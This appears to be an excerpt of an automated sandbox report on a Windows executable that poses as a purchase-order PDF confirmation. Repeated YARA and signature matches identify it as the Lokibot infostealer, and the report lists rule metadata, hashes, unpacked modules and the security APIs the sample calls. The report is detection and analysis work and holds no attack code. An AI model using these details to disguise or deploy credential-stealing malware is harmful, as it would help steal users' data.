            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1261094325.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1261094325.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1261094325.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2490346022.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000005.00000002.2490346022.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000005.00000002.2490346022.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000005.00000002.2490346022.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2490346022.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000000.00000002.1258932642.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1258932642.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1258932642.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: ADES_PO_Confirmation_20250307_pdf.bat.exe PID: 8032, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: Process Memory Space: ADES_PO_Confirmation_20250307_pdf.bat.exe PID: 520, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: initial sampleStatic PE information: Filename: ADES_PO_Confirmation_20250307_pdf.bat.exe
            Source: initial sampleStatic PE information: Filename: ADES_PO_Confirmation_20250307_pdf.bat.exe
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_087B3DA80_2_087B3DA8
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_026D3E1C0_2_026D3E1C
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_026D7B7B0_2_026D7B7B
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_04E587E00_2_04E587E0
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_04E587D00_2_04E587D0
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_04E522080_2_04E52208
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_04E522180_2_04E52218
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_04E514580_2_04E51458
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_08651A900_2_08651A90
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_086544E00_2_086544E0
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_086545580_2_08654558
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_08653A780_2_08653A78
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_086592600_2_08659260
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_086514E00_2_086514E0
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 0_2_086514D00_2_086514D0
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 5_2_0040549C5_2_0040549C
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 5_2_004029D45_2_004029D4
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: String function: 0041219C appears 45 times
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: String function: 00405B6F appears 42 times
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeBinary or memory string: OriginalFilename vs ADES_PO_Confirmation_20250307_pdf.bat.exe
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exe, 00000000.00000002.1261094325.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs ADES_PO_Confirmation_20250307_pdf.bat.exe
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exe, 00000000.00000000.1247142307.0000000000500000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemlig.exe8 vs ADES_PO_Confirmation_20250307_pdf.bat.exe
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exe, 00000000.00000002.1258932642.0000000002AAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs ADES_PO_Confirmation_20250307_pdf.bat.exe
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exe, 00000000.00000002.1261094325.0000000003951000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs ADES_PO_Confirmation_20250307_pdf.bat.exe
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exe, 00000000.00000002.1276714743.0000000006C30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs ADES_PO_Confirmation_20250307_pdf.bat.exe
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exe, 00000000.00000002.1257654696.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ADES_PO_Confirmation_20250307_pdf.bat.exe
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exe, 00000000.00000002.1277289036.0000000008750000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs ADES_PO_Confirmation_20250307_pdf.bat.exe
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exe, 00000000.00000002.1258932642.00000000028E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs ADES_PO_Confirmation_20250307_pdf.bat.exe
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeBinary or memory string: OriginalFilenamemlig.exe8 vs ADES_PO_Confirmation_20250307_pdf.bat.exe
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.1261094325.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1261094325.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1261094325.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2490346022.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000005.00000002.2490346022.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000005.00000002.2490346022.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000005.00000002.2490346022.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.2490346022.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000000.00000002.1258932642.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1258932642.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1258932642.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: ADES_PO_Confirmation_20250307_pdf.bat.exe PID: 8032, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: Process Memory Space: ADES_PO_Confirmation_20250307_pdf.bat.exe PID: 520, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, Ru3Nvi5l2iT0GbGpTq.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, Ru3Nvi5l2iT0GbGpTq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, Ru3Nvi5l2iT0GbGpTq.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, Hmn7RAV1VVmcdFLUpJ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.8750000.6.raw.unpack, Hmn7RAV1VVmcdFLUpJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
